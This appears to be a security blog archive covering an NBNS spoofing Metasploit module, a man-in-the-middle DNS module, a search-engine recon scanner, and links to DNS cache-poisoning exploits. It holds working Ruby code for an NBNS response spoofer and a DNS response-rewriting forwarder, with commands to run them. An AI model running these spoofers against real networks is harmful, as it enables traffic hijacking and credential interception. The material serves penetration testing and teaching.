Tim Medin, over at the Packetstan blog, has written an excellent post detailing the implementation of an NBNS spoofing module that has just been added to the latest Metasploit trunk:

This module is based on an old tool, nbnspoof.py, that I wrote to perform this attack, originally described (as nearly as I can tell) by Sumit Siddharth. It’s a very simple attack, taking advantage of the way Windows falls back to a NetBIOS Name Service (NBNS) broadcast query once local and DNS lookups fail: anyone on the segment can answer a broadcast, so a spoofer simply replies with its own address. If you’ve ever turned a careful eye to broadcast traffic on any network with Windows systems, you’ve probably noticed that a surprising number of lookups fall through to NBNS for various reasons.

Tim does a great job of describing how the spoofing works, how to use it in the context of a penetration test, and how the module was developed. Because it is integrated into the current version of the Metasploit Framework, I recommend it over the original Python version. Maybe one day soon I’ll one-up him and try to turn it into a Meterpreter post-exploitation script, in order to hijack remote hosts into being spoofers ;-) .

Until then, and in related news, I’ve submitted a talk on some other forms of Metasploit sorcery that I have developed recently to Defcon (and tomorrow to Blackhat once the CFP opens). With any luck I’ll be speaking at one or the other later this year. Either way, I’ll see some of my readers there, hopefully!
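To make the fallback concrete, here is an added example (written for this page; it is neither Tim’s module nor the original nbnspoof.py) of the NBNS packets involved, in Ruby: RFC 1002’s name encoding, a parser for the broadcast name query a Windows host sends when DNS has failed, and the positive name query response a spoofer sends back claiming the name. The name regex, the spoofed address, the 300-second TTL and the sample query are assumptions chosen for the example; the only network code is the listener at the end, which is not invoked.

```ruby
require 'socket'

NBNS_PORT = 137
NB_TYPE   = 0x0020 # NetBIOS general name service RR type (RFC 1002)
IN_CLASS  = 0x0001

# First-level encoding (RFC 1002 4.1): pad the name with spaces to 15 bytes,
# append a one-byte service suffix (0x00 workstation, 0x20 file server), then
# write each byte as two nibbles, each as 'A' + nibble. Result is 32 chars.
def nbns_encode_name(name, suffix = 0x00)
  raw = name.upcase.ljust(15)[0, 15] + suffix.chr
  raw.bytes.map { |b| ((b >> 4) + 0x41).chr + ((b & 0x0F) + 0x41).chr }.join
end

# Inverse of nbns_encode_name: returns [name, suffix].
def nbns_decode_name(encoded)
  bytes = encoded.bytes.each_slice(2).map { |hi, lo| ((hi - 0x41) << 4) | (lo - 0x41) }
  [bytes[0, 15].pack('C*').rstrip, bytes[15]]
end

# A broadcast name query as a Windows host sends it after DNS has failed
# (flags 0x0110: recursion desired + broadcast). Constructed sample input.
def build_nbns_query(tid, name, suffix = 0x20)
  [tid, 0x0110, 1, 0, 0, 0].pack('n6') +
    [32].pack('C') + nbns_encode_name(name, suffix) + "\x00".b +
    [NB_TYPE, IN_CLASS].pack('nn')
end

# Returns {tid:, name:, suffix:} for an NB name query, nil for anything else.
def parse_nbns_query(pkt)
  pkt = pkt.b
  return nil if pkt.bytesize < 50
  tid, flags, qdcount = pkt.unpack('nnn')
  return nil unless (flags & 0x8000).zero? && qdcount == 1   # must be a query
  return nil unless pkt.getbyte(12) == 32 && pkt.getbyte(45) == 0 # one 32-char label
  qtype, qclass = pkt[46, 4].unpack('nn')
  return nil unless qtype == NB_TYPE && qclass == IN_CLASS
  name, suffix = nbns_decode_name(pkt[13, 32])
  { tid: tid, name: name, suffix: suffix }
end

# Positive name query response (RFC 1002 4.2.13) claiming `ip` owns the name.
# Flags 0x8580: response, authoritative answer, RD and RA set. NB_FLAGS 0x0000
# marks a unique name on a B-node. TTL of 300 s is an arbitrary choice here.
def build_nbns_response(tid, name, suffix, ip, ttl = 300)
  rdata = [0x0000].pack('n') + ip.split('.').map(&:to_i).pack('C4')
  [tid, 0x8580, 0, 1, 0, 0].pack('n6') +
    [32].pack('C') + nbns_encode_name(name, suffix) + "\x00".b +
    [NB_TYPE, IN_CLASS, ttl, rdata.bytesize].pack('nnNn') + rdata
end

# Parse a single-answer response back into {tid:, name:, suffix:, ip:}.
def parse_nbns_response(pkt)
  pkt = pkt.b
  return nil if pkt.bytesize < 62
  tid, flags, _qd, ancount = pkt.unpack('n4')
  return nil unless (flags & 0x8000) != 0 && ancount == 1
  name, suffix = nbns_decode_name(pkt[13, 32])
  { tid: tid, name: name, suffix: suffix, ip: pkt[58, 4].unpack('C4').join('.') }
end

# The spoofer's decision: answer only queries whose name matches `pattern`
# (an anchored regex, so legitimate lookups on the segment are left alone).
# Returns the reply bytes, or nil to stay silent.
def nbns_spoof_reply(query_pkt, spoof_ip, pattern)
  q = parse_nbns_query(query_pkt)
  return nil unless q && pattern.match?(q[:name])
  build_nbns_response(q[:tid], q[:name], q[:suffix], spoof_ip)
end

# Listen on UDP/137 and answer matching broadcast queries (needs root; not
# invoked here). The reply is unicast back to whoever asked.
def run_nbns_spoofer(spoof_ip, pattern)
  sock = UDPSocket.new
  sock.setsockopt(Socket::SOL_SOCKET, Socket::SO_BROADCAST, true)
  sock.bind('0.0.0.0', NBNS_PORT)
  loop do
    pkt, (_af, port, _host, src_ip) = sock.recvfrom(1024)
    reply = nbns_spoof_reply(pkt, spoof_ip, pattern)
    sock.send(reply, 0, src_ip, port) if reply
  end
end
```

Run `run_nbns_spoofer('10.0.0.5', /\AFILESERVER\z/)` as root on the target segment to claim just that name; a query for anything else gets no reply. The same parser is just as useful on the defensive side: feed it the UDP/137 broadcasts from a span port and you get a list of the names on your network that are falling through to NBNS.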

 

Today, results were posted for Sherri Davidoff and Jonathan Ham’s third network forensics puzzle contest. The puzzles, hosted at forensicscontest.com, are meant to encourage the development of network forensic tools that might be integrated into SANS training and toolkits. Puzzle #3 involved pulling information from an Apple TV device’s network traffic.

I participated in this contest and wrote a small Python script that generates a .CSV summary of Apple TV activity on a network and extracts .plist files from that traffic. It was a lot of fun to tinker around with, and it looks like I just managed to land in the list of finalists. You can check out the finalist entries, including mine, at the following links:

These competitions are fun to participate in, and I’m hoping that I’ll have time to finish up my entry for Puzzle #4 before the deadline.

 

There has been a lot of speculation today surrounding this Wall Street Journal article:

According to the article, the insurgents were able to capture drone video feeds using software such as SkyGrabber.  SkyGrabber is, according to its website, essentially a sniffer for satellite Internet connections that recognizes and extracts files from the traffic it sees.  This works because the downlink from the satellite to the clients on the ground is not directed at any one receiver: everyone under the satellite can see the same data stream.

This article has fueled a lot of discussion along the lines of “Why aren’t drone feeds encrypted?”.  There are plenty of people writing about that question, so I’m going to take it in another direction:

“What if we (including the WSJ) are missing something here?”

What if the videos found on insurgent laptops were not direct data streams from the drones themselves?  What if they were actually captured as files being shuffled from one place to another over a satellite Internet connection, after they had been recorded and saved?

Now, I haven’t used SkyGrabber, so I would like some feedback from someone who has, but there are some things about this that don’t make sense to me yet.  Looking at the feature list for SkyGrabber and (especially) the screenshots, I see progress bars for the downloads.  A progress bar implies that the software knows the total size of what it is downloading.  That suggests, to me at least, that SkyGrabber gets most of its data from protocols like HTTP (and the P2P protocols it lists on the product pages) that announce the size and name of a file before transmitting it.

How do you know when a live stream, such as one a drone is transmitting, is going to end?  And if it does record live streams, how likely is it that SkyGrabber would recognize whatever streaming format the drone uses?  Someone with experience using SkyGrabber (or, less likely, with unmanned drone communication protocols) might be able to chime in on this.

Now, if recordings are being shuffled around after a mission from location to location, then it would make sense for those to go over protocols that SkyGrabber might understand.  This would fit with the “U.S. officials” statement that there was no evidence that the flights could be controlled or interfered with.

Without any other evidence, it’s hard to take the WSJ article as the complete story.  There’s a lot of room for alternatives:

  • The feeds being intercepted may not be live
  • Software other than SkyGrabber might be used
  • Maybe the story’s right-on and the drone is communicating over well-understood and parse-able protocols

It’s even possible that, while these incidents involved interception of non-live data, the drones do communicate unencrypted and the possibility exists (with better tools) to intercept their live feeds.

It’s very hard to say, but those are some of my thoughts on the matter.

 

The kind folks who run Black Hat have gone ahead and released the audio and video of Dan Kaminsky’s talk at Black Hat USA 2008, entitled “Black Ops 2008: It’s The End Of The Cache As We Know It”, or “64K Should Be Good Enough For Anyone”.  This is the talk where he discusses the DNS flaw that has been big news lately, and even if you’re already familiar with the details, Kaminsky is a very entertaining speaker.

Thanks to blackhat.com.

 

Everything we knew, plus some really neat tricks.

 

On Episode 116 of PaulDotCom Security Weekly, Paul mentioned how it would be nice if one could have a little bit finer control over the behavior of Metasploit’s fake DNS server.  It seemed like an easy enough hack, so I’ve thrown this together.  I can see this being useful in some situations, and hopefully you will too.

Metasploit’s fakedns.rb is good at what it does, which is respond to any DNS query with a spoofed response pointing at a specific IP address.  This module, which I’ve decided to name “mitm_fakedns.rb”, is a dirty, filthy hack of fakedns.rb.  It’s not nearly as polished and thought-out as the web_search_scan.rb module I wrote and posted about a couple of days ago, but it is kinda neat anyway.

It listens for DNS queries and forwards each one to a real DNS server that you specify (REALDNS).  When the answer comes back, it rewrites the response to point at the IP address you chose for any name that matches one of your regular expressions, and returns it to the client; names that don’t match pass through untouched.  This lets you be a little more “surgical” with whatever attack you have planned, by spoofing only the domain names of interest.

Let’s have a look at the “show info”:

HacBook:framework wesley$ sudo ./msfconsole
Password:

                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|

       =[ msf v3.2-release
+ -- --=[ 299 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 68 aux

msf > use auxiliary/server/mitm_fakedns
msf auxiliary(mitm_fakedns) > info

       Name: MITM DNS Service
    Version: 5540

Provided by:
  unknown <ddz>
  hdm <hdm@metasploit.com>
  Wesley McGrew <wesley@mcgrewsecurity.com>

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME                   yes       File of ip,regex for filtering responses
  REALDNS                    yes       Ask this server for answers
  SRVHOST   0.0.0.0          yes       The local host to listen on.
  SRVPORT   53               yes       The local port to listen on.

Description:
  This hack of the metasploit fakedns.rb serves as a sort of MITM DNS
  server. Requests are passed through to a real DNS server, and the
  responses are modified before being returned to the client, if they
  match regular expressions set in FILENAME.

Once it's loaded, we can set our variables:

msf auxiliary(mitm_fakedns) > cat /Users/wesley/hosts.txt
[*] exec: cat /Users/wesley/hosts.txt

192.168.1.1,google.com
10.0.0.1,example.com
msf auxiliary(mitm_fakedns) > set FILENAME /Users/wesley/hosts.txt
FILENAME => /Users/wesley/hosts.txt
msf auxiliary(mitm_fakedns) > set REALDNS 192.168.1.254
REALDNS => 192.168.1.254
msf auxiliary(mitm_fakedns) > run
[*] Auxiliary module running as background job
msf auxiliary(mitm_fakedns) >

The file you specify should have an IP address and a regular expression, one pair per line.  Keep in mind that these are regular expressions, not literal hostnames: an unanchored “google.com” also matches names like “notgoogle.com”, and the unescaped dot matches any character, so anchor and escape the pattern if you need to be precise.  Once it’s running, you can test it out by pointing “dig” at it:

HacBook:~ wesley$ dig @127.0.0.1 example.com

; <<>> DiG 9.4.1-P1 <<>> @127.0.0.1 example.com
; (1 server found)
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38312
;; flags: qr ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;example.com.			IN	A

;; ANSWER SECTION:
example.com.		99270	IN	A	10.0.0.1

;; Query time: 39 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Mon Aug  4 22:59:01 2008
;; MSG SIZE  rcvd: 45
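As an added example (not the module’s own source), here is the core of what mitm_fakedns does in plain Ruby, using only the standard library’s Resolv::DNS message codec: parse the ip,regex file, forward the query, and rewrite matching A records in the real answer before handing it back. Each rule is matched against the owner name of every A record in the answer, so a CNAME chain still ends up pointing at the spoofed address; whether the module matches the query name or the answer name is an assumption here, as are the constructed sample response and its documentation-range addresses. The serve loop at the end is the forwarding part and is not invoked.

```ruby
require 'resolv'
require 'socket'

# Parse the FILENAME format: one "ip,regex" pair per line (blank and '#' lines ignored).
def parse_rules(text)
  text.each_line.map(&:strip).reject { |l| l.empty? || l.start_with?('#') }.map do |line|
    ip, pattern = line.split(',', 2)
    [ip.strip, Regexp.new(pattern.strip, Regexp::IGNORECASE)]
  end
end

# First rule whose regex matches the name, or nil. Patterns are used exactly as
# given, unanchored, so "google.com" also matches "notgoogle.com".
def spoof_ip_for(name, rules)
  hit = rules.find { |_ip, re| re.match?(name) }
  hit && hit[0]
end

# Decode an upstream response, swap the address in every A record whose owner
# name matches a rule, and re-encode. Everything else (CNAMEs, other record
# types, TTLs, the transaction ID and flags) passes through untouched so the
# client sees a normal-looking answer. Returns [bytes, records_rewritten].
def rewrite_response(raw, rules)
  msg = Resolv::DNS::Message.decode(raw)
  changed = 0
  msg.answer.map! do |name, ttl, data|
    ip = spoof_ip_for(name.to_s, rules)
    if ip && data.is_a?(Resolv::DNS::Resource::IN::A)
      changed += 1
      [name, ttl, Resolv::DNS::Resource::IN::A.new(ip)]
    else
      [name, ttl, data]
    end
  end
  [msg.encode, changed]
end

# Flatten an answer section to [owner, type, value] rows for inspection.
def answer_rows(raw)
  Resolv::DNS::Message.decode(raw).answer.map do |name, _ttl, data|
    type  = data.class.name.split('::').last
    value = data.respond_to?(:address) ? data.address.to_s : data.name.to_s
    [name.to_s, type, value]
  end
end

# Constructed sample of what an upstream resolver might return (addresses are
# documentation-range placeholders; the CNAME chain shows that the rewrite
# lands on the A record at the end of the chain).
def sample_upstream_response
  m = Resolv::DNS::Message.new(0x95a8)
  m.qr = 1; m.rd = 1; m.ra = 1
  m.add_question('example.com', Resolv::DNS::Resource::IN::A)
  m.add_answer('example.com', 99270, Resolv::DNS::Resource::IN::A.new('198.51.100.7'))
  m.add_answer('www.google.com', 300,
               Resolv::DNS::Resource::IN::CNAME.new(Resolv::DNS::Name.create('www.l.google.com')))
  m.add_answer('www.l.google.com', 300, Resolv::DNS::Resource::IN::A.new('198.51.100.9'))
  m.add_answer('mail.example.org', 60, Resolv::DNS::Resource::IN::A.new('198.51.100.11'))
  m.encode
end

# The forwarding loop: accept a query, ask the real server, rewrite, reply.
# Not invoked here; binding port 53 needs root.
def serve(listen_host, listen_port, real_dns, rules, timeout = 5)
  sock = UDPSocket.new
  sock.bind(listen_host, listen_port)
  loop do
    query, (_af, cport, _host, chost) = sock.recvfrom(4096)
    up = UDPSocket.new
    up.send(query, 0, real_dns, 53)
    raw = IO.select([up], nil, nil, timeout) ? up.recvfrom(4096)[0] : nil
    up.close
    next unless raw # upstream timed out: stay silent, as a dead resolver would
    out, _n = rewrite_response(raw, rules)
    sock.send(out, 0, chost, cport)
  end
end
```

With the hosts.txt from above, `serve('0.0.0.0', 53, '192.168.1.254', parse_rules(File.read('hosts.txt')))` behaves like the module: example.com comes back as 10.0.0.1 with the real TTL, and anything not matching a rule is answered exactly as the real server answered it.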

This should serve as a pretty good drop-in replacement for fakedns.rb for some attacks.  Here’s the source:

 

The other day I decided that I wanted to become more familiar with the internals of the Metasploit Framework, so with the latest SVN checkout of the framework and a couple of books on Ruby, I started digging.  A fun project, I decided, would be to port some of my existing tools and scripts into the framework.  I’ve started with this ground-up rework of GooSweep (which had fallen into disrepair), and I have to say: putting it together in Ruby on top of the Metasploit framework was a very enjoyable experience, and the result is useful and usable well beyond what GooSweep used to be.  I’m definitely going to be writing more in the framework from now on.

This module, web_search_scan, will perform search engine queries (Google by default, but configurable) for each IP address (and, optionally, hostnames found by rDNS) in a range specified by the user.  If there are hits on the search engine for a host, the module will display the number of hits, and URLs to view the results.  If you have a database connected, it will also log notes to the database for each host that it finds.

It’s a simple idea, but I’ve found the technique to be very useful.  It requires a little manual work to check out the results, since there’s no way of really knowing what you’re going to find, but you can turn up some interesting things.  For example:

  • Publicly-accessible and indexed web logs and stats – You can tell if someone at that IP has visited a site, and possibly even when, how often, and what their user agent was
  • Wiki edits and IP user pages
  • Mailing list and newsgroup posts – Hits from the mail/post headers, or occasionally admins asking for configuration help that don’t censor addresses
  • Abuse reports for open proxies, spammers, etc.
  • Posts to forums, comments, or guestbooks that log and display IP addresses

With a little detective work, you can map out some known active hosts on a network, and some information about those hosts, without having to actively probe the network.  This is great for the information-gathering phase of a penetration test.  I’ve also found it to be very helpful for learning more about potential attackers when doing incident response.

Here’s what the module’s info looks like in Metasploit (output edited for width):

HacBook:framework wesley$ ./msfconsole

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|

       =[ msf v3.2-release
+ -- --=[ 299 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 68 aux

msf > use auxiliary/scanner/misc/web_search_scan
msf auxiliary(web_search_scan) > info

       Name: Web Search Engine IP Address Scanner
    Version: 5612

Provided by:
  Wesley McGrew <wesley@mcgrewsecurity.com>

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  LOOKUP       false            yes       Reverse lookup IPs and
                                          search hostnames too? (Not
                                          stealthy)
  PROXYCHAINS                   no        Pipe-delimited (|) list of
                                          proxy chains to use
  QUIET        false            yes       Quiet output (still logs to
                                          db)
  RETRIES      3                yes       Number of times to retry
                                          queries if they fail
  RHOSTS                        yes       The target address range or
                                          CIDR identifier
  SLEEP        3                yes       Minimum time to sleep between
                                          requests (seconds)
  SLEEPRAND    3                yes       Random additional time to
                                          sleep (seconds)
  THREADS      1                yes       The number of concurrent threads

Description:
  This scanner will do a web search engine query for each IP address
  (optionally, rDNS names as well) and record the number of hits and a
  URL to the query results. This is a useful for determining some
  active hosts and information gathering about a network without
  having to directly probe the network. Common results include
  publicly accessible web access logs, mailing list posts, abuse
  reports, and wikipedia edits. (WARNING: If you set LOOKUP to true,
  your target may notice the reverse DNS lookups.)

msf auxiliary(web_search_scan) >

A quick overview of these options:

  • RHOSTS - Set of IP addresses you want to scan.  You can comma-delimit sets of hosts, use dash-separated ranges, or CIDR masks, just like with any Metasploit module
  • LOOKUP - If you like, the module can do a reverse-DNS query for each IP address and perform search engine queries for each hostname found.  If you're trying hard to be stealthy, you may want to avoid this option, as the target's DNS will see the queries.
  • SLEEP and SLEEPRAND - After each search engine query, the module sleeps for SLEEP + rand(SLEEPRAND+1) seconds.  Many search engines will throttle or block you if you send queries faster than a normal human user would.  You can adjust this to be faster or slower, depending on how dangerous you feel.
  • RETRIES - Sometimes, even when we're careful, a search engine will respond with something the module has no idea how to parse, or stops responding altogether.  This is the number of times the module will attempt a query before giving up.  At the end of a complete scan, the module displays all the queries that failed, so that you are aware of any possible false negatives.
  • QUIET - If set to "true", the module will only output status at the beginning and end of its run.  If you set this, you will want to have a database connected, as that's the only place the results will be going.  You can set this, use "run -j" to execute the scan, and it will run in the background fairly quietly, letting you do other things in metasploit while this slowwww scan runs :) .
  • PROXYCHAINS and THREADS - Many Metasploit modules allow you to specify a proxy chain.  This one allows you to specify multiple chains, which lets you parallelize the scan and finish faster, even with all the necessary sleeping.  For best results, set THREADS a few higher than the number of proxy chains.  Each thread claims a proxy for the duration of each individual query.  I apologize that this feature isn't extremely well tested (I left my botnet in my other pants).

There are also some "advanced" options that let you tweak where and how the module gets its results.  This can be useful if you need to use a different search engine, or to fix the current one if its page layout changes and breaks the regex.  Here's what you can tweak:

msf auxiliary(web_search_scan) > show advanced
Module advanced options:
   Name           : NOHITSREGEX
   Current Setting: (?:No results found)|(?:did not match any documents)
   Description    : Regex to match a zero-hit search
   Name           : NUMHITSREGEX
   Current Setting: of (?:about )?<b>((?:[,\d])+)<\/b> for <b>
   Description    : Regex to match number of hits
   Name           : SEARCHHOST
   Current Setting: www.google.com
   Description    : Hostname of search engine
   Name           : SEARCHPORT
   Current Setting: 80
   Description    : Search Port
   Name           : SEARCHURI
   Current Setting: /search?hl=en&q=*&btnG=Google+Search
   Description    : Search URI (* for query location)
   Name           : TIMEOUT
   Current Setting: 10
   Description    : Timeout for the search engine to respond
   Name           : USERAGENT
   Current Setting: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
   Description    : The User-Agent header to use for all requests

One thing you could do with the SEARCHURI option is add extra parameters such as “site:example.com” to look for mentions of IP addresses and hosts only on a specific site.
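As an added example, not the module’s own code, here is the module’s core loop reduced to plain Ruby: fill the SEARCHURI template, classify each result page with the NOHITSREGEX and NUMHITSREGEX defaults shown above, apply the SLEEP + rand(SLEEPRAND+1) delay, and retry up to RETRIES times before reporting a query as failed. The fetcher is injected rather than doing HTTP so the example runs offline; the sample result pages are constructed to match the regexes above, the quoting of the IP address in the query is an assumption, and the `nil` versus `0` distinction is the point: a page the module cannot parse is not the same as a page that says there were no hits.

```ruby
require 'uri'

# Defaults copied from the module's advanced options.
NOHITS_REGEX  = /(?:No results found)|(?:did not match any documents)/
NUMHITS_REGEX = %r{of (?:about )?<b>((?:[,\d])+)<\/b> for <b>}

# Fill the SEARCHURI template ('*' marks the query location). The query is
# quoted so the engine searches for the exact address rather than four
# separate numbers (an assumption; the page does not show the module's quoting).
def build_search_url(host, port, uri_template, query)
  encoded = URI.encode_www_form_component(%("#{query}"))
  path = uri_template.sub('*') { encoded }
  "http://#{host}:#{port}#{path}"
end

# Classify a result page: 0 for a confirmed zero-hit page, an Integer hit
# count, or nil when neither regex matched (layout change, error or block page).
def parse_hit_count(html, nohits: NOHITS_REGEX, numhits: NUMHITS_REGEX)
  return 0 if nohits.match?(html)
  m = numhits.match(html)
  m && m[1].delete(',').to_i
end

# SLEEP + rand(SLEEPRAND + 1): a fixed floor plus jitter so the cadence is
# not perfectly periodic.
def sleep_interval(sleep_min, sleep_rand, rng = Random.new)
  sleep_min + rng.rand(sleep_rand + 1)
end

# One host: retry up to `retries` times when the fetch raises or the page is
# unparseable. A result with hits: nil is a failure to report, not "no hits".
def search_host(query, fetch, url, retries: 3)
  attempts = 0
  loop do
    attempts += 1
    html = begin
      fetch.call(url)
    rescue StandardError
      nil
    end
    hits = html && parse_hit_count(html)
    return { query: query, url: url, hits: hits, attempts: attempts } if hits
    return { query: query, url: url, hits: nil, attempts: attempts } if attempts >= retries
  end
end

# Scan a list of addresses. `fetch` maps url -> html; `sleeper` is injectable
# so the loop can be exercised without really sleeping. Failed queries are
# collected and returned so they can be listed at the end of the run.
def scan_hosts(hosts, fetch, host: 'www.google.com', port: 80,
               uri: '/search?hl=en&q=*&btnG=Google+Search',
               sleep_min: 3, sleep_rand: 3, retries: 3,
               rng: Random.new, sleeper: method(:sleep))
  results = []
  failed  = []
  hosts.each_with_index do |h, i|
    r = search_host(h, fetch, build_search_url(host, port, uri, h), retries: retries)
    (r[:hits] ? results : failed) << r
    sleeper.call(sleep_interval(sleep_min, sleep_rand, rng)) if i < hosts.size - 1
  end
  { results: results, failed: failed }
end
```

Wire `fetch` to Net::HTTP (or to a proxy chain) to run it for real; the `failed` list is the end-of-scan false-negative report, and `results` entries with `hits: 0` are the hosts you can stop thinking about.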

Here’s what a scan might look like (searching non-routable ranges guarantees some results, but it’s a bit pointless too :) ):

So there you have it!  Here’s the code, if you want to drop it in the framework (tested with the latest SVN of metasploit) and use it yourself:

 

…and I couldn’t be happier.  I’m going to start writing “weaponized code” instead of “exploits”.  This will totally make up for having to give up “reverse-engineering” for “deep analysis” for “legal reasons” ;) .

However you feel about people publishing exploits for the DNS flaw already, there’s a selection of them out there now, and you might as well have a look at the code if you’re a penetration tester.  Now, I’m going to give out some links to these, so if you happen to be a blackhat that relies only on this site for your exploit needs, I’m going to have to ask you to go ahead and close your browser:

  • I)ruid and H D Moore’s metasploit module (and in the context of the trunk version of metasploit) – This one’s pretty nice.  Like a good metasploit module, it has functionality built in to test a server for vulnerability.  It can’t spoof if there’s already a cached entry for the domain you’re trying to spoof, however it is smart enough to check for this ahead of time and sleep until it can try again.  This one also randomizes the domain names it’s using while it tries to guess the transaction ID.
  • Julien Desfossez’s standalone exploit – Fewer frills than the Metasploit module, but it gets points for being written in Python with the excellent Scapy.  From the code, it looks like the domain names it uses while guessing the transaction ID are pretty predictable:  a3.victim.com, a4.victim.com, a5.victim.com, etc. etc. etc.

I’ll talk about other exploits when I see them, if I think they’re interesting.  I’m honestly surprised it’s taken as long as it has for exploits to come out, as it’s a pretty easy vulnerability to wrap your head around, and pretty straightforward to generate the packets.

This’ll give you something to play with in the lab while the Internet crumbles around you.

Edit:

This about sums up my thoughts:

I guarantee that |)ruid/hdm’s exploit was not the first. Who would you prefer poisons your cache: discreet pros or kiddies with metasploit?

Thanks Dino.

 

The folks who put on the excellent Securabit podcast have decided to put together a quick and dirty episode-between-episodes on the recent DNS vulnerability.  They’ve decided to call these spontaneous episodes “Securabytes”, and this is the first one:

Since Dan Kaminsky doesn’t leap around the apartment to find his headset in order to podcast on a 10 minute notice at 10PM, I was grabbed off IRC to discuss the details of the vulnerability and its impact.  I had a blast recording this episode with Rob, Joel, and Martin McKeay (of the great Network Security podcast and blog).  Being able to bounce it off these guys really helped to convey not only the vulnerability itself, but what it means for admins, end users, and even penetration testers.

I hope you give it a listen, and subscribe to Securabit in your iTunes or RSS!

 

Whenever a new sure-fire blockbuster movie sequel comes out, there’s always the attempt to wring some more cash out of the previous entries.  There’ll be a DVD box set that runs about $10 a disc, with all the previous films in one nice looking collection.  These sell well, both to people new to a series wanting to catch up, as well as long-time fans.

Dan Kaminsky’s talk at this year’s Black Hat USA conference on August 6th where he drops the new DNS 0-day will undoubtedly be the sure-fire blockbuster talk of the conference.  Kaminsky has given excellent talks on various network security topics for years now, so in the spirit of a cash-in box set, I’ve spent a little time today collecting up links to previous talks he’s given.

Most of these are in his recurring theme of “TCP/IP Black Ops”, and I have learned a lot over the years, listening to these talks.  The recent ones were fairly easy to find on Google Video, however some of the older ones required digging around a bit (mostly on the EasyNews mirror).  I’ve embedded or linked video, where available.  Some talks I could only find in mp3 format.  Some of the older Defcon talks may be available in realmedia video format on the defcon site, but I really prefer to stick to non-realmedia formats.

If you need slides to go along with the audio-only talks, it looks like most of them are available on Kaminsky’s bio page.

As I said, I’ve learned a lot from these talks, and highly recommend them to anyone else interested in getting elbows-deep into network security.  Enjoy!

If you’re handy with Gimp and want to create box art for a Dan Kaminsky box set, leave a comment ;-)

Defcon 9 (2001): Gateway Cryptography: Hacking Impossible Tunnels Through Improbable Networks with OpenSSH

Defcon 10 (2002): Black Ops of TCP/IP

Defcon 11 (2003): Stack Black Ops

Blackhat 2004: Black Ops of DNS

22C3: Black Ops Of TCP/IP 2005.5

Toorcon 2006 – Black Ops Of TCP-IP 2006

Shmoocon 2007 – Weaponizing Noam Chomsky (or Hacking with Pattern Languages)

Defcon 15 – Black Ops 2007: Design Reviewing The Web

© 2012 McGrew Security Suffusion theme by Sayontan Sinha